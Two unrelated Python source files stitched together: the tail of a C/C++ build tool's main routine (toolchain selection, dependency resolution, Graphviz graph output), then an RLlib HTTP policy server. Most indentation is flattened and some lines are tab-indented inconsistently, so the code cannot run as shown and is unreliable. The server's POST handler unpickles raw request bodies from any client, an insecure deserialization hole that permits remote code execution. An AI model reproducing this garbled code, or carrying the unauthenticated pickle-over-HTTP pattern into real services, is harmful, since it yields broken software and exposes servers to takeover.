for chain in _shared_globals.alltoolchains:
validArchList |= set(_shared_globals.alltoolchains[chain.lower()]().GetValidArchitectures())
elif args.toolchain:
_shared_globals.selectedToolchains = set( ) # Reset the selected toolchains.
for chain in args.toolchain:
if chain.lower() not in _shared_globals.alltoolchains:
log.LOG_ERROR( "Unknown toolchain: {}".format( chain ) )
return
validArchList |= set(_shared_globals.alltoolchains[chain.lower()]().GetValidArchitectures())
else:
if platform.system( ) == "Windows":
validArchList |= set(_shared_globals.alltoolchains["msvc"]().GetValidArchitectures())
else:
validArchList |= set(_shared_globals.alltoolchains["gcc"]().GetValidArchitectures())
def BuildWithToolchain( chain ):
def BuildWithTarget( target ):
if target is not None:
_shared_globals.target = target.lower( )
def BuildWithArchitecture( project, architecture ):
_shared_globals.allarchitectures.add(architecture)
os.chdir( project.scriptPath )
newproject = project.copy()
if _shared_globals.target:
newproject.targetName = _shared_globals.target
else:
newproject.targetName = projectSettings.currentProject.defaultTarget
if newproject.targetName not in newproject.targets:
log.LOG_INFO( "Project {} has no rules specified for target {}. Skipping.".format( newproject.name,
newproject.targetName ) )
return
projectSettings.currentProject = newproject
SetOutputArchitecture(architecture)
for targetFunc in newproject.targets[newproject.targetName]:
targetFunc( )
if newproject.outputArchitecture in newproject.archFuncs:
for archFunc in newproject.archFuncs[newproject.outputArchitecture]:
archFunc()
for file in newproject.fileOverrides:
projCopy = newproject.copy()
projectSettings.currentProject = projCopy
for func in newproject.fileOverrides[file]:
func()
newproject.fileOverrideSettings[file] = projCopy
				def FilterDepends( dependList ):
					#Resolve each dependency to a fully-qualified project key, skipping any
					#dependency that doesn't apply to the active toolchain/architecture.
					altered = []
					for depend in dependList:
						if depend.includeToolchains and newproject.activeToolchainName not in depend.includeToolchains:
							continue
						if depend.includeArchitectures and newproject.outputArchitecture not in depend.includeArchitectures:
							continue
						if depend.excludeToolchains and newproject.activeToolchainName in depend.excludeToolchains:
							continue
						if depend.excludeArchitectures and newproject.outputArchitecture in depend.excludeArchitectures:
							continue
						altered.append( "{}@{}#{}${}".format( depend.libName, newproject.targetName, newproject.outputArchitecture, newproject.activeToolchainName ) )
					return altered
				newproject.linkDepends = FilterDepends( newproject.linkDepends )
				newproject.linkDependsIntermediate = FilterDepends( newproject.linkDependsIntermediate )
				newproject.linkDependsFinal = FilterDepends( newproject.linkDependsFinal )
				newproject.srcDepends = FilterDepends( newproject.srcDepends )
				newproject.srcDependsIntermediate = FilterDepends( newproject.srcDependsIntermediate )
				newproject.srcDependsFinal = FilterDepends( newproject.srcDependsFinal )
newproject.key = "{}@{}#{}${}".format( newproject.name, newproject.targetName, newproject.outputArchitecture, newproject.activeToolchainName )
_shared_globals.projects.update( { newproject.key: newproject } )
for project in _shared_globals.tempprojects.values( ):
if chain is not None:
_shared_globals.selectedToolchains.add(chain)
project.activeToolchainName = chain
if project.supportedToolchains and project.activeToolchainName not in project.supportedToolchains:
continue
project.activeToolchain = project.toolchains[project.activeToolchainName]
cmdLineGlobalArchList = args.architecture
cmdLineToolchainArchList = args.__dict__[_shared_globals.allToolchainArchStrings[project.activeToolchainName][0].replace("-", "_")]
cmdLineArchList = set()
if cmdLineGlobalArchList:
cmdLineArchList.update(cmdLineGlobalArchList)
if cmdLineToolchainArchList:
cmdLineArchList.update(cmdLineToolchainArchList)
if cmdLineArchList:
for arch in cmdLineArchList:
if arch not in validArchList:
log.LOG_ERROR("Toolchain {} does not support architecture {}".format(project.activeToolchainName, arch))
Exit(1)
architectures = _utils.OrderedSet(project.activeToolchain.GetValidArchitectures())
if project.supportedArchitectures:
architectures &= project.supportedArchitectures
if arch in architectures:
BuildWithArchitecture(project, arch)
elif args.aa:
architectures = _utils.OrderedSet(project.activeToolchain.GetValidArchitectures())
if project.supportedArchitectures:
architectures &= project.supportedArchitectures
for arch in architectures:
BuildWithArchitecture(project, arch)
else:
BuildWithArchitecture(project, project.activeToolchain.Compiler().GetDefaultArchitecture())
if args.at:
for target in _shared_globals.alltargets:
BuildWithTarget( target )
elif args.target:
for target in args.target:
BuildWithTarget( target )
for target in args.target:
if target.lower( ) not in _shared_globals.alltargets:
log.LOG_ERROR( "Unknown target: {}".format( target ) )
return False
else:
BuildWithTarget( None )
return True
if args.ao:
_shared_globals.selectedToolchains = set( ) # Reset the selected toolchains.
for chain in _shared_globals.alltoolchains:
if not BuildWithToolchain( chain ):
return
elif args.toolchain:
_shared_globals.selectedToolchains = set( ) # Reset the selected toolchains.
for chain in args.toolchain:
if chain.lower() not in _shared_globals.alltoolchains:
log.LOG_ERROR( "Unknown toolchain: {}".format( chain ) )
return
if not BuildWithToolchain( chain ):
return
else:
BuildWithToolchain( None )
os.chdir( mainFileDir )
if project_build_list:
inputProjectSet = set( project_build_list )
existingProjectSet = set( _shared_globals.tempprojects )
validProjectSet = set()
foundExistingProjectSet = set()
foundValidProjectSet = set()
for proj in _shared_globals.projects.keys():
projName = proj.rsplit( "@", 1 )[0]
validProjectSet.add( projName ) # Fill in the set of valid projects for the current build.
if projName in inputProjectSet:
_shared_globals.project_build_list.add( proj )
# Search for projects that are either not valid or non-existent.
for projName in inputProjectSet:
if projName in existingProjectSet:
foundExistingProjectSet.add( projName )
if projName in validProjectSet:
foundValidProjectSet.add( projName )
# Create a list of the projects that don't exist and a list of projects that are invalid for the current build.
nonExistentProjectList = sorted( inputProjectSet.difference( foundExistingProjectSet ) )
invalidProjectList = sorted( inputProjectSet.difference( nonExistentProjectList ).difference( foundValidProjectSet ) )
forceExit = False
if nonExistentProjectList:
log.LOG_ERROR( "The following projects do not exist: {}".format( ", ".join( nonExistentProjectList ) ) )
forceExit = True
if invalidProjectList:
log.LOG_ERROR( "The following projects cannot be built with the selected configuration: {}".format( ", ".join( invalidProjectList ) ) )
forceExit = True
if forceExit:
Exit( 1 )
else:
_shared_globals.project_build_list = set(_shared_globals.projects.keys())
for projName in _shared_globals.projects:
project = _shared_globals.projects[projName]
flats_added = {projName}
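	#Recursively collect the transitive closure of this project's link dependencies into project.flattenedDepends.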
def add_flats(deps):
for dep in deps:
if dep in flats_added:
continue
flats_added.add(dep)
project.flattenedDepends.add(dep)
proj = _shared_globals.projects[dep]
add_flats(proj.linkDepends)
add_flats(proj.linkDependsIntermediate)
add_flats(proj.linkDependsFinal)
depends = project.linkDepends + project.linkDependsIntermediate + project.linkDependsFinal
for dep in depends:
if dep not in _shared_globals.projects:
log.LOG_ERROR("Project {} references unknown dependency {}".format(project.name, dep.rsplit("@")[0]))
return
proj = _shared_globals.projects[dep]
project.flattenedDepends.add(dep)
add_flats(proj.linkDepends)
add_flats(proj.linkDependsFinal)
add_flats(proj.linkDependsIntermediate)
project.finalizeSettings()
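	#Applications terminate the dependency chain, so any deferred "final" link depends are folded into their direct depends here.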
if project.type == ProjectType.Application:
project.linkDepends += project.linkDependsFinal
project.linkDependsFinal = []
for projName in _shared_globals.projects:
project = _shared_globals.projects[projName]
intermediates_added = {projName}
finals_added = {projName}
def add_intermediates(deps):
for dep in deps:
if dep in intermediates_added:
continue
intermediates_added.add(dep)
project.reconciledLinkDepends.add(dep)
proj = _shared_globals.projects[dep]
add_finals(proj.linkDependsIntermediate)
def add_finals(deps):
for dep in deps:
if dep in finals_added:
continue
finals_added.add(dep)
project.reconciledLinkDepends.add(dep)
proj = _shared_globals.projects[dep]
add_finals(proj.linkDependsFinal)
depends = project.linkDepends
if args.dg:
depends = project.linkDepends + project.linkDependsIntermediate + project.linkDependsFinal
for dep in depends:
if dep not in _shared_globals.projects:
log.LOG_ERROR("Project {} references unknown dependency {}".format(project.name, dep.rsplit("@")[0]))
return
proj = _shared_globals.projects[dep]
project.reconciledLinkDepends.add(dep)
if args.dg:
add_finals(proj.linkDependsFinal)
add_intermediates(proj.linkDependsIntermediate)
elif project.type == ProjectType.Application:
add_finals(proj.linkDependsFinal)
else:
add_intermediates(proj.linkDependsIntermediate)
if not args.dg:
project.finalizeSettings2()
already_errored_link = { }
already_errored_source = { }
def insert_depends( proj, projList, already_inserted = set( ) ):
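	#Note: the mutable default for already_inserted is shared across all top-level calls; that's safe here
	#only because every key added on entry is removed again before returning (see the end of this function).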
already_inserted.add( proj.key )
if proj not in already_errored_link:
already_errored_link[proj] = set( )
already_errored_source[proj] = set( )
	#Iterate over a copy, since invalid dependencies are removed from the set below.
	for depend in list( proj.reconciledLinkDepends ):
if depend in already_inserted:
log.LOG_WARN(
"Circular dependencies detected: {0} and {1} in linkDepends".format( depend.rsplit( "@", 1 )[0],
proj.name ) )
continue
if depend not in _shared_globals.projects:
if depend not in already_errored_link[proj]:
log.LOG_ERROR(
"Project {} references non-existent link dependency {}".format( proj.name,
depend.rsplit( "@", 1 )[0] ) )
already_errored_link[proj].add( depend )
proj.reconciledLinkDepends.remove(depend)
continue
projData = _shared_globals.projects[depend]
projList[depend] = projData
insert_depends( projData, projList )
	#Iterate over a copy, since invalid dependencies are removed from the list below.
	for depend in list( proj.srcDepends ):
if depend in already_inserted:
log.LOG_WARN(
"Circular dependencies detected: {0} and {1} in srcDepends".format( depend.rsplit( "@", 1 )[0],
proj.name ) )
continue
if depend not in _shared_globals.projects:
			if depend not in already_errored_source[proj]:
				log.LOG_ERROR(
					"Project {} references non-existent source dependency {}".format( proj.name,
						depend.rsplit( "@", 1 )[0] ) )
				already_errored_source[proj].add( depend )
			proj.srcDepends.remove( depend )
continue
projData = _shared_globals.projects[depend]
projList[depend] = projData
insert_depends( projData, projList )
already_inserted.remove( proj.key )
if _shared_globals.project_build_list:
newProjList = { }
for proj in _shared_globals.project_build_list:
projData = _shared_globals.projects[proj]
newProjList[proj] = projData
insert_depends( projData, newProjList )
_shared_globals.projects = newProjList
_shared_globals.sortedProjects = _utils.SortProjects( _shared_globals.projects )
if args.dg:
builder = StringIO()
builder.write('digraph G {\n\tlayout="neato";\n\toverlap="false";\n\tsplines="spline"\n')
colors = [
"#ff0000", "#cc5200", "#b2742d", "#858c23", "#20802d",
"#00ffcc", "#39c3e6", "#205380", "#003380", "#38008c",
"#ff40d9", "#e53967", "#f20000", "#7f4620", "#cca300",
"#66ff00", "#00cc6d", "#36d9ce", "#007a99", "#0061f2",
"#0000f2", "#cc00ff", "#d9368d", "#7f202d", "#991400",
"#f28100", "#dae639", "#69bf30", "#269973", "#208079",
"#00a2f2", "#397ee6", "#0000e6", "#8d29a6", "#990052"
]
idx = 0
libs_drawn = set()
for project in _shared_globals.sortedProjects:
color = colors[idx]
idx += 1
if idx == len(colors):
idx = 0
builder.write('\t{0} [shape="{1}" color="{2}" style="filled" fillcolor="{2}30"];\n'.format(project.name, "box3d" if project.type == ProjectType.Application else "oval", color))
for dep in project.linkDepends:
otherProj = _shared_globals.projects[dep]
builder.write('\t{} -> {} [color="{}"];\n'.format(project.name, otherProj.name, color))
for dep in project.linkDependsIntermediate:
otherProj = _shared_globals.projects[dep]
builder.write('\t{} -> {} [color="{}B0" style="dashed" arrowhead="onormal"];\n'.format(project.name, otherProj.name, color))
for dep in project.linkDependsFinal:
otherProj = _shared_globals.projects[dep]
builder.write('\t{} -> {} [color="{}B0" style="dashed" arrowhead="onormal"];\n'.format(project.name, otherProj.name, color))
if args.with_libs:
project.activeToolchain = project.toolchains[project.activeToolchainName]
project.activeToolchain.SetActiveTool("linker")
def drawLibs(libraries, style):
for lib in libraries:
lib = lib.replace("-", "_")
if lib not in libs_drawn:
builder.write('\t{} [shape="diamond" color="#303030" style="filled" fillcolor="#D0D0D080"];\n'.format(lib))
libs_drawn.add(lib)
builder.write('\t{} -> {} [color="{}" style="{}" arrowhead="onormal"];\n'.format(project.name, lib, color, style))
drawLibs(project.libraries, "solid")
if "libraries" in project._intermediateScopeSettings:
drawLibs(project._intermediateScopeSettings["libraries"], "dashed")
if "libraries" in project._finalScopeSettings:
drawLibs(project._finalScopeSettings["libraries"], "dashed")
tc = object.__getattribute__(project, "finalToolchains")[object.__getattribute__(project, "activeToolchainName")]
tc.SetActiveTool("linker")
if "libraries" in tc.activeTool._settingsOverrides:
drawLibs(tc.activeTool._settingsOverrides["libraries"], "dashed")
tc = object.__getattribute__(project, "intermediateToolchains")[object.__getattribute__(project, "activeToolchainName")]
tc.SetActiveTool("linker")
if "libraries" in tc.activeTool._settingsOverrides:
drawLibs(tc.activeTool._settingsOverrides["libraries"], "dashed")
builder.write("}\n")
with open("depends.gv", "w") as f:
f.write(builder.getvalue())
log.LOG_BUILD("Wrote depends.gv")
try:
from graphviz import Digraph
except ImportError:
    log.LOG_WARN("graphviz library not found. You can open depends.gv with graphviz or a similar dot viewer to view the graph, or install graphviz with pip install graphviz.")
else:
graph = Digraph(comment="CSBuild Dependency Graph", format="png", engine="dot", filename="depends")
# Hack: override Digraph.source so render() emits the handwritten DOT
# text built above instead of the (empty) body built via the graphviz API.
Digraph.source = property(lambda self: builder.getvalue())
graph.render("depends.gv", view=True)
log.LOG_BUILD("Wrote depends.png")
return
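# For reference, a minimal sketch of the DOT text this branch emits
# (project names and colors are illustrative, not from a real build):
#
#   digraph G {
#       layout="neato";
#       overlap="false";
#       splines="spline"
#       MyApp [shape="box3d" color="#ff0000" style="filled" fillcolor="#ff000030"];
#       MyLib [shape="oval" color="#cc5200" style="filled" fillcolor="#cc520030"];
#       MyApp -> MyLib [color="#ff0000"];
#   }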
#headerCacheFile = os.path.join(_shared_globals.cacheDirectory, "header_info.csbc")
#if os.path.exists(headerCacheFile):
# log.LOG_BUILD("Loading cache data...")
# with open(headerCacheFile, "rb") as f:
# _shared_globals.allheaders = pickle.load(f)
# mtime = os.path.getmtime(headerCacheFile)
# for header in _shared_globals.allheaders.keys():
# if not header:
# continue
# try:
# htime = os.path.getmtime(header)
# if htime > mtime:
# del _shared_globals.allheaders[header]
# except:
# del _shared_globals.allheaders[header]
for proj in _shared_globals.sortedProjects:
if not proj.prebuilt and (not proj.shell or args.generate_solution):
proj.prepareBuild( )
else:
proj.minimalPrepareBuild()
# Remove projects that don't actually build.
_shared_globals.sortedProjects = [ proj for proj in _shared_globals.sortedProjects if not proj.prebuilt and (not proj.shell or args.generate_solution) ]
#with open(headerCacheFile, "wb") as f:
# pickle.dump(_shared_globals.allheaders, f, 2)
_utils.CheckVersion( )
_utils.ChunkedBuild( )
_utils.PreparePrecompiles( )
# Measure after chunking and precompile preparation so the logged figure
# covers all of task preparation.
totaltime = time.time( ) - _shared_globals.starttime
totalmin = math.floor( totaltime / 60 )
totalsec = math.floor( totaltime % 60 )
log.LOG_BUILD( "Task preparation took {0}:{1:02}".format( int( totalmin ), int( totalsec ) ) )
if args.gui:
_shared_globals.autoCloseGui = args.auto_close_gui
from . import _gui
global _guiModule
_guiModule = _gui
if args.generate_solution is not None:
if not args.solution_path:
args.solution_path = os.path.join( ".", "Solutions", args.generate_solution )
if args.generate_solution not in _shared_globals.project_generators:
log.LOG_ERROR( "No solution generator present for solution of type {}".format( args.generate_solution ) )
Exit( 1 )
generator = _shared_globals.project_generators[args.generate_solution]( args.solution_path, args.solution_name, args.solution_args )
generator.WriteProjectFiles( )
log.LOG_BUILD( "Done" )
elif _shared_globals.CleanBuild:
_clean( )
elif args.install:
_install( )
elif args.install_headers:
_installHeaders()
elif args.install_output:
_installOutput()
elif _shared_globals.rebuild:
_clean( )
_make( )
else:
_make( )
#Print out any errors or warnings incurred so the user doesn't have to scroll to see what went wrong
if _shared_globals.warnings:
print("\n")
log.LOG_WARN( "Warnings encountered during build:" )
for warn in _shared_globals.warnings[0:-1]:
log.LOG_WARN( warn )
if _shared_globals.errors:
print("\n")
log.LOG_ERROR( "Errors encountered during build:" )
for error in _shared_globals.errors[0:-1]:
log.LOG_ERROR( error )
if not _shared_globals.build_success:
Exit( 1, False )
else:
Exit( 0, False )
#Regular sys.exit can't be called because we HAVE to reacquire the import lock at exit.
#We stored sys.exit earlier, now we overwrite it to call our wrapper.
sys.exit = Exit
try:
if not hasattr(sys, "runningSphinx"):
_run( )
Exit( 0 )
except Exception:
if not imp.lock_held():
imp.acquire_lock()
raise
|
policy_server_input.py
|
import logging
import queue
import threading
import traceback
from http.server import SimpleHTTPRequestHandler, HTTPServer
from socketserver import ThreadingMixIn
import ray.cloudpickle as pickle
from ray.rllib.offline.input_reader import InputReader
from ray.rllib.env.policy_client import PolicyClient, \
create_embedded_rollout_worker
from ray.rllib.utils.annotations import override, PublicAPI
logger = logging.getLogger(__name__)
logger.setLevel("INFO") # TODO(ekl) this is needed for cartpole_server.py
class PolicyServerInput(ThreadingMixIn, HTTPServer, InputReader):
"""REST policy server that acts as an offline data source.
This launches a multi-threaded server that listens on the specified host
and port to serve policy requests and forward experiences to RLlib. For
high performance experience collection, it implements InputReader.
For an example, run `examples/cartpole_server.py` along
with `examples/cartpole_client.py --inference-mode=local|remote`.
Examples:
>>> pg = PGTrainer(
... env="CartPole-v0", config={
... "input": lambda ioctx:
... PolicyServerInput(ioctx, addr, port),
... "num_workers": 0, # Run just 1 server, in the trainer.
... })
>>> while True:
...     pg.train()
>>> client = PolicyClient("localhost:9900", inference_mode="local")
>>> eps_id = client.start_episode()
>>> action = client.get_action(eps_id, obs)
>>> ...
>>> client.log_returns(eps_id, reward)
>>> ...
>>> client.log_returns(eps_id, reward)
"""
@PublicAPI
def __init__(self, ioctx, address, port):
"""Create a PolicyServerInput.
This class implements rllib.offline.InputReader, and can be used with
any Trainer by configuring
{"num_workers": 0,
"input": lambda ioctx: PolicyServerInput(ioctx, addr, port)}
Note that by setting num_workers: 0, the trainer will only create one
rollout worker / PolicyServerInput. Clients can connect to the launched
server using rllib.env.PolicyClient.
Args:
ioctx (IOContext): IOContext provided by RLlib.
address (str): Server addr (e.g., "localhost").
port (int): Server port (e.g., 9900).
"""
self.rollout_worker = ioctx.worker
self.samples_queue = queue.Queue()
self.metrics_queue = queue.Queue()
def get_metrics():
completed = []
while True:
try:
completed.append(self.metrics_queue.get_nowait())
except queue.Empty:
break
return completed
# Forwards client-reported rewards directly into the local rollout
# worker. This is a bit of a hack since it is patching the get_metrics
# function of the sampler.
self.rollout_worker.sampler.get_metrics = get_metrics
handler = _make_handler(self.rollout_worker, self.samples_queue,
self.metrics_queue)
HTTPServer.__init__(self, (address, port), handler)
logger.info("")
logger.info("Starting connector server at {}:{}".format(address, port))
logger.info("")
thread = threading.Thread(name="server", target=self.serve_forever)
thread.daemon = True
thread.start()
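# Running the HTTP server on a daemon thread means it is torn down
# automatically when the trainer process exits.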
@override(InputReader)
def next(self):
return self.samples_queue.get()
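# next() blocks on the queue, so RLlib's sampling loop simply waits
# until a connected client reports its next batch.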
def _make_handler(rollout_worker, samples_queue, metrics_queue):
# Only used in remote inference mode. We must create a new rollout worker
# then since the original worker doesn't have the env properly wrapped in
# an ExternalEnv interface.
child_rollout_worker = None
inference_thread = None
lock = threading.Lock()
def setup_child_rollout_worker():
nonlocal lock
nonlocal child_rollout_worker
nonlocal inference_thread
with lock:
if child_rollout_worker is None:
(child_rollout_worker,
inference_thread) = create_embedded_rollout_worker(
rollout_worker.creation_args(), report_data)
child_rollout_worker.set_weights(rollout_worker.get_weights())
def report_data(data):
nonlocal child_rollout_worker
batch = data["samples"]
batch.decompress_if_needed()
samples_queue.put(batch)
for rollout_metric in data["metrics"]:
metrics_queue.put(rollout_metric)
if child_rollout_worker is not None:
child_rollout_worker.set_weights(rollout_worker.get_weights(),
rollout_worker.get_global_vars())
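# Pushing fresh weights on every reported batch keeps the embedded
# inference worker in sync with the latest server-side policy.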
class Handler(SimpleHTTPRequestHandler):
def __init__(self, *a, **kw):
super().__init__(*a, **kw)
def do_POST(self):
# Default the length to 0 if the header is missing; the previous form
# passed 0 as the int() base, which raises on an absent header.
content_len = int(self.headers.get("Content-Length", 0))
raw_body = self.rfile.read(content_len)
parsed_input = pickle.loads(raw_body)
try:
response = self.execute_command(parsed_input)
self.send_response(200)
self.end_headers()
self.wfile.write(pickle.dumps(response))
except Exception:
self.send_error(500, traceback.format_exc())
def execute_command(self, args):
command = args["command"]
response = {}
# Local inference commands:
if command == PolicyClient.GET_WORKER_ARGS:
logger.info("Sending worker creation args to client.")
response["worker_args"] = rollout_worker.creation_args()
elif command == PolicyClient.GET_WEIGHTS:
logger.info("Sending worker weights to client.")
response["weights"] = rollout_worker.get_weights()
response["global_vars"] = rollout_worker.get_global_vars()
elif command == PolicyClient.REPORT_SAMPLES:
logger.info("Got sample batch of size {} from client.".format(
args["samples"].count))
report_data(args)
# Remote inference commands:
elif command == PolicyClient.START_EPISODE:
setup_child_rollout_worker()
assert inference_thread.is_alive()
response["episode_id"] = (
child_rollout_worker.env.start_episode(
args["episode_id"], args["training_enabled"]))
elif command == PolicyClient.GET_ACTION:
assert inference_thread.is_alive()
response["action"] = child_rollout_worker.env.get_action(
args["episode_id"], args["observation"])
elif command == PolicyClient.LOG_ACTION:
assert inference_thread.is_alive()
child_rollout_worker.env.log_action(
args["episode_id"], args["observation"], args["action"])
elif command == PolicyClient.LOG_RETURNS:
assert inference_thread.is_alive()
child_rollout_worker.env.log_returns(
args["episode_id"], args["reward"], args["info"])
elif command == PolicyClient.END_EPISODE:
assert inference_thread.is_alive()
child_rollout_worker.env.end_episode(args["episode_id"],
args["observation"])
else:
raise ValueError("Unknown command: {}".format(command))
return response
return Handler
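# A minimal client-side sketch of talking to this server (host/port and
# the obs/reward variables are illustrative; see
# examples/cartpole_client.py for the full version):
#
#   from ray.rllib.env.policy_client import PolicyClient
#   client = PolicyClient("http://localhost:9900", inference_mode="remote")
#   eps_id = client.start_episode(training_enabled=True)  # START_EPISODE
#   action = client.get_action(eps_id, obs)               # GET_ACTION
#   client.log_returns(eps_id, reward)                    # LOG_RETURNS
#   client.end_episode(eps_id, obs)                       # END_EPISODE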
|